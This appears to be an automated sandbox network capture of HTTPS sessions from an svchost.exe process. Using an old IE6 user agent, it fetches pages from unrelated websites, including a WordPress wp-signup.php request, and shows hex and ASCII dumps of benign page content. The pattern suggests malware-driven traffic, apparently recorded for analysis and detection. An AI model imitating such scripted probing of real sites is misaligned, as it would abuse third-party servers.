                                                                                                                                                                              2023-09-15 05:28:20 UTC8131INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                              Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                              2023-09-15 05:28:20 UTC8147INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                              Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                              2023-09-15 05:28:20 UTC8163INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                              Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC8179INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                              Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC8195INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                              Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                              2023-09-15 05:28:20 UTC8211INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                              Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                              2023-09-15 05:28:20 UTC8227INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                              2023-09-15 05:28:20 UTC8243INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                              Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              28192.168.2.34504283.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:18 UTC5600OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: dataform.co.uk
                                                                                                                                                                              2023-09-15 05:28:20 UTC6369INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                              Keep-Alive: timeout=2, max=100
                                                                                                                                                                              Content-Length: 49180
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              X-Powered-By: PHP/7.0.29
                                                                                                                                                                              X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                              Strict-Transport-Security: max-age=10886400
                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:19 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2023-09-15 05:28:20 UTC6370INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                              Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                              2023-09-15 05:28:20 UTC6371INData Raw: 73 63 72 69 70 74 3e 0a 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 66 6f 72 6d 20 26 23 38 32 31 31 3b 20 4d 61 6e 61 67 65 20 46 6f 72 6d 73 2c 20 44 65 76 69 63 65 73 20 26 61 6d 70 3b 20 44 61 74 61 46 6f 72 6d 20 26 23 38 32 31 31 3b 20 53 69 6d 70 6c 69 66 79 20 44 61 74 61 20 43 6f 6c 6c 65 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f
                                                                                                                                                                              Data Ascii: script><title>Dataform &#8211; Manage Forms, Devices &amp; DataForm &#8211; Simplify Data Collection</title><link rel='dns-prefetch' href='//cdnjs.cloudflare.com'/><link rel='dns-prefetch' href='//www.google.com'/><link rel='dns-prefetch' href='//fo
                                                                                                                                                                              2023-09-15 05:28:20 UTC6379INData Raw: 74 65 28 30 20 2d 33 30 29 27 25 33 45 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 6f 70 61 63 69 74 79 27 20 66 72 6f 6d 3d 27 31 27 20 74 6f 3d 27 30 27 20 64 75 72 3d 27 31 73 27 20 62 65 67 69 6e 3d 27 30 2e 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 2f 25 33 45 25 33 43 2f 72 65 63 74 25 33 45 25 33 43 72 65 63 74 20 20 78 3d 27 34 36 2e 35 27 20 79 3d 27 34 30 27 20 77 69 64 74 68 3d 27 37 27 20 68 65 69 67 68 74 3d 27 32 30 27 20 72 78 3d 27 35 27 20 72 79 3d 27 35 27 20 66 69 6c 6c 3d 27 72 67 62 61 25 32 38 35 31 25 32 43 35 31 25 32 43 35 31 25 32 43 30 2e 32 35 25 32 39 27 20 74 72 61 6e 73 66 6f 72 6d 3d 27 72 6f 74 61
                                                                                                                                                                              Data Ascii: te(0 -30)'%3E %3Canimate attributeName='opacity' from='1' to='0' dur='1s' begin='0.6666666666666666s' repeatCount='indefinite'/%3E%3C/rect%3E%3Crect x='46.5' y='40' width='7' height='20' rx='5' ry='5' fill='rgba%2851%2C51%2C51%2C0.25%29' transform='rota
                                                                                                                                                                              2023-09-15 05:28:20 UTC6387INData Raw: 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 34 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 4c 53 5f 4d 65 74 61 3d 7b 22 76 22 3a 22 36 2e 38 2e 34 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 4c 61 79 65 72 53 6c 69 64 65 72 2f 73
                                                                                                                                                                              Data Ascii: ataform.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script><script type='text/javascript'>//<![CDATA[var LS_Meta={"v":"6.8.4"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/LayerSlider/s
                                                                                                                                                                              2023-09-15 05:28:20 UTC6395INData Raw: 62 75 73 69 6e 65 73 73 20 44 61 74 61 66 6f 72 6d 20 63 61 6e 20 74 61 6b 65 20 63 61 72 65 20 6f 66 20 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 20 79 6f 75 72 20 70 61 70 65 72 2d 62 61 73 65 64 20 62 75 73 69 6e 65 73 73 20 66 6f 72 6d 73 20 69 6e 74 6f 20 61 20 66 75 6c 6c 79 20 64 69 67 69 74 69 73 65 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 6d 6f 62 69 6c 65 20 73 6f 6c 75 74 69 6f 6e 2e 20 52 65 64 75 63 65 20 43 6f 73 74 73 20 26 23 38 32 31 31 3b 20 49 6d 70 72 6f 76 65 20 45 66 66 69 63 69 65 6e 63 69 65 73 20 26 23 38 32 31 31 3b 20 53 61 76 65 20 54 69 6d 65 5b 2f 76 63 5f 63 6f 6c 75 6d 6e 5f 74 65 78 74 5d 5b 76 63 5f 62 74 6e 20 74 69 74 6c 65 3d 26 23 38 32 32 31 3b 52 45 51 55 45 53 54 20 44 45 4d 4f 26 23 38 32 32 31 3b 20 73 74 79
                                                                                                                                                                              Data Ascii: business Dataform can take care of transitioning your paper-based business forms into a fully digitised user-friendly mobile solution. Reduce Costs &#8211; Improve Efficiencies &#8211; Save Time[/vc_column_text][vc_btn title=&#8221;REQUEST DEMO&#8221; sty
                                                                                                                                                                              2023-09-15 05:28:20 UTC7107INData Raw: 6f 2e 75 6b 2f 72 65 73 6f 75 72 63 65 73 2f 68 65 6c 70 2d 63 65 6e 74 72 65 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 53 75 70 70 6f 72 74 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6e 61 76 20 68 6f 76 65 72 2d 73 74 79 6c 65 2d 62 67 20 6c 65 76 65 6c 2d 61 72 72 6f 77 73 2d 6f 6e 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 34
                                                                                                                                                                              Data Ascii: o.uk/resources/help-centre/' data-level='1'><span class="menu-item-text"><span class="menu-text">Support</span></span></a><ul class="sub-nav hover-style-bg level-arrows-on"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5254
                                                                                                                                                                              2023-09-15 05:28:20 UTC7115INData Raw: 63 6c 61 73 73 3d 22 77 66 2d 77 72 61 70 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 66 2d 63 6f 6e 74 61 69 6e 65 72 2d 62 6f 74 74 6f 6d 22 3e 0a 0a 09 09 09 09 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 66 2d 66 6c 6f 61 74 2d 6c 65 66 74 22 3e 0a 0a 09 09 09 09 09 09 c2 a9 20 32 30 32 33 20 4d 61 67 69 63 6f 6d 6d 20 44 61 74 61 66 6f 72 6d 20 7c 20 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 20 20 7c 20 3c 61 20 68 72 65 66 3d 22 2f 63 6f 6f 6b 69 65 2f 22 3e 43 6f 6f 6b 69 65 20 50 6f 6c 69 63 79 3c 2f 61 3e 20 20 7c 20 3c 61 20 68 72 65 66 3d 22 2f 74 65 72 6d 73 2d 61 6e 64 2d 63 6f 6e 64 69 74 69 6f 6e 73 2f 22 3e 54 65 72 6d 73 20 26 61 6d 70 3b 20 43
                                                                                                                                                                              Data Ascii: class="wf-wrap"><div class="wf-container-bottom"><div class="wf-float-left"> 2023 Magicomm Dataform | <a href="/privacy/">Privacy Policy</a> | <a href="/cookie/">Cookie Policy</a> | <a href="/terms-and-conditions/">Terms &amp; C


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              29192.168.2.345976172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:18 UTC5601OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: clinicasanluis.com.co
                                                                                                                                                                              2023-09-15 05:28:18 UTC5685INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:18 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              location: https://www.clinicasanluis.com.co/
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B3nMQxYj3ztSniEojq4G118PVHmFksoNjVRTrNQx7cmUmC%2BB27keZIuoMtokAhbVSEp8Mpa5wM2pQrtfp3GR49EAH0g0de%2FUgOgYfGnE5lFC1KCz6J7wU5mgRY4vWdDX%2FTcMWKMkHSg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e772cdf9c43b0-EWR
                                                                                                                                                                              2023-09-15 05:28:18 UTC5686INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                              Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                              2023-09-15 05:28:18 UTC5686INData Raw: 3e 0a 0d 0a
                                                                                                                                                                              Data Ascii: >
                                                                                                                                                                              2023-09-15 05:28:18 UTC5686INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              3192.168.2.35020994.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC2OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
